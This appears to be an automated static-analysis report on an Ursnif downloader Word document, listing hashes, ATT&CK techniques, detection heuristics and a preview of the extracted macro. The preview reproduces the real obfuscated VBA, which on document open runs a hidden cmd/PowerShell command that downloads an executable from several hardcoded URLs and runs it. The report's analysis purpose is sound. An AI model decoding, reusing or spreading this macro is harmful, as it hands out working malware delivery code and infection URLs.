ursnif — Office (OLE) malware analysis

Static analysis result for SHA-256 fdd034d3d2970af6…

MALICIOUS

Office (OLE)

Size: 64.5 KB
Created: 2018-09-10 12:55:00
Authoring application: Microsoft Office Word
First seen: 2018-10-07
MD5: eed67966f982c493e150201a8eabef22
SHA-1: 6fb6194314866a63cd567333b6c3da5064b77063
SHA-256: fdd034d3d2970af6cc5ceadbfcb1836475b186e3142a1fa20a354d04d4ba8bed
Risk score: 182

Malware Insights

ursnif · confidence 95%

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1204.002 Malicious File
  • T1566.001 Spearphishing Attachment

The sample contains VBA macros, including a Document_Open macro that utilizes the Shell() function to execute arbitrary commands. ClamAV identifies the file as Doc.Downloader.URSNIF-6729855-3, strongly suggesting a downloader variant of the Ursnif family. The primary function of the macro appears to be downloading and executing a second-stage payload.

Heuristics 5

  • ClamAV: Doc.Downloader.URSNIF-6729855-3 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.URSNIF-6729855-3
  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 6116 bytes
SHA-256: 828787b460d5d3dfa734eee3a952028d0cc549c0ac79b9c6ea9593de757d6a53
Preview of the extracted script (first 1,000 lines):
Attribute VB_Name = "EjjVhqDaJZHj"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_open()
On _
Error _
Resume _
Next
   Second "juLdXwomA" + "Vh" + "165012490" + "AUrMCRYhV"
   Second "1842" + "uFXwjb"
   Second "7879" + "8259"
Shell oBmYLzwQRb + iPDjUllQmhd + CwLCK, CStr(vbHide)
   Second "jktlHPru" + "5616"
End Sub



Attribute VB_Name = "vVcjTXTjfUulj"
Function oBmYLzwQRb()

On _
Error _
Resume _
Next
Second "LhFGdwcciYARcN" + "RHhTP"
SkaLlkPia = Format(Chr(16 + 5 + 8 + 18 + 52)) + "md " + "/V/" + Format(Chr(11 + 3 + 5 + 12 + 36)) + Format(Chr(5 + 1 + 2 + 5 + 21)) + "s" + "^e^t ^" + "d^A" + "=" + "^ "
Second "qWLGWEAP" + "hBEEVEh"
   Second "2288" + "pDz"
   Second "oI" + "HXIncu" + "7928" + "175122756"
lRvBGriS = " ^ ^ ^" + " " + "^ ^  " + "^ ^ ^  " + "^ " + "^ ^ " + "  ^" + "}}{^" + "h" + Format(Chr(16 + 5 + 8 + 18 + 52)) + "^" + "t^" + "a" + Format(Chr(16 + 5 + 8 + 18 + 52)) + "^}^"
Second "kRrFY" + "JdkaIV" + "CzYLLlAiw" + "T"
   Second "EjlOYL" + "8419" + "BivG" + "VWoikUN"
   Second "GTPDwQaTinhiGz" + "8846" + "8668" + "kRs"
   Second "4535" + "j" + "95902537" + "hdD"
   Second "476434881" + "jE"
OfiSN = ";^k" + "^" + "a^" + "er" + "^b^;^" + "PX^J^$ "
Second "nKPuPlRIuaiB" + "mCZ"
   Second "sjYDl" + "8888" + "fVF" + "bOA"
   Second "4900" + "KIkKiA" + "429016408" + "irUY"
   Second "221532748" + "128184254"
   Second "aslqVfLjDAht" + "GZ" + "WwJIvOw" + "7095"
klRLiiPTz = "^m" + "^et" + "^I^-e" + "^k^o" + "vnI^;)^" + "PX^" + "J^$" + "^ " + "^,Ur" + "r^" + "$(" + "^e" + "^l^"
Second "4994" + "L"
CTmNiUQV = "iF" + "^dao" + "^lnw" + "^o^D^" + ".l^" + "LN$^{yr" + "t{)^i" + "^jA$ " + "ni "
Second "203777138" + "vhR" + "Ew" + "hGuhCVD"
YOjLfDRB = "^Urr^$(" + "^h" + Format(Chr(16 + 5 + 8 + 18 + 52)) + "a^er" + "of;" + "'^" + "exe^" + ".^'^+^w" + "P^f$+" + "^'\^'" + "+" + Format(Chr(16 + 5 + 8 + 18 + 52)) + "il^b" + "up^:v"
Second "Oj" + "256947346" + "FP" + "458404671"
   Second "Swf" + "mkRAkHOrO" + "EXYHC" + "BhZucGCkBaRnz"
   Second "mabRawEOCMGVRX" + "zzSAN" + "iXiPsZJ" + "wJVTrFo"
   Second "tMu" + "lTUGluEzcKCaEo" + "Obtt" + "jOozYVCfqqOsE"
UnTGQ = "ne^$=P" + "X^J$" + "^" + ";'0^" + "2^6'^" + " = ^w^P" + "f^$^;)" + "'^" + "@^'(ti" + "l^pS." + "^'"
Second "i" + "smQPI"
   Second "9586" + "hwKqarqZAo"
   Second "uhkR" + "SzlGalXkW"
jsDdwutV = "^y" + "n^" + "7" + "/" + "^u" + "^a^.^g" + "ro^." + "sr^e^k" + Format(Chr(16 + 5 + 8 + 18 + 52))
Second "289472848" + "clZHz"
   Second "35237612" + "RS"
UtAJtwvSj = "^or" + "^dn^a^l" + "r^e" + "^mm^u^" + "s//" + "^:pt" + "^th@DW/" + "^gr^" + "o^" + ".ya^ws" + "gn"
Second "Bs" + "6691" + "OjzAMDjRz" + "12506600"
   Second "CqKRHR" + "Vio"
TpzwztYE = "^i^ke^h" + "^t//^" + ":^p" + "^t^t^" + "h@8^" + "H^A/mo" + Format(Chr(16 + 5 + 8 + 18 + 52)) + "^."
oBmYLzwQRb = SkaLlkPia + lRvBGriS + OfiSN + klRLiiPTz + CTmNiUQV + YOjLfDRB + UnTGQ + jsDdwutV + UtAJtwvSj + TpzwztYE
   Second "oGQOsDWZzt" + "T" + "358050075" + "ACNt"
   Second "OICRMMGmU" + "104595126"
   Second "72581059" + "jijiGBwp"
End Function
Function iPDjUllQmhd()

On _
Error _
Resume _
Next
Second "215931049" + "207698068" + "vC" + "AzQQfHlUkiGHYK"
   Second "FYcnSiG" + "i"
   Second "NksllHCi" + "vaYvhbjdkGD" + "129277600" + "323669784"
   Second "fhU" + "1265"
UdaKVE = "erotsh" + Format(Chr(16 + 5 + 8 + 18 + 52)) + "u^op^yr" + "l^ew" + "e^" + "j^e^" + "h^t.^w"
Second "290" + "290573140" + "su" + "9420"
   Second "H" + "dnDJKoi" + "2235" + "IwpUXj"
   Second "7329" + "jjN"
TknAw = "^w^w//" + ":p^tt" + "h@S^h^b" + "^WR" + "v^h" + "/"
Second "189805944" + "5197" + "PAH" + "LZO"
   Second "wVtpjJN" + "60727676" + "a" + "sWi"
   Second "zWrP" + "Qbjb"
   Second "Czr" + "NoAOq" + "9623" + "bsj"
okqdzZY = "^mo" + Format(Chr(16 + 5 + 8 + 18 + 52)) + "." + Format(Chr(16 + 5 + 8 + 18 + 52)) + "ih^p^" + "arig" + "i^d//" + ":ptt" +
... (truncated)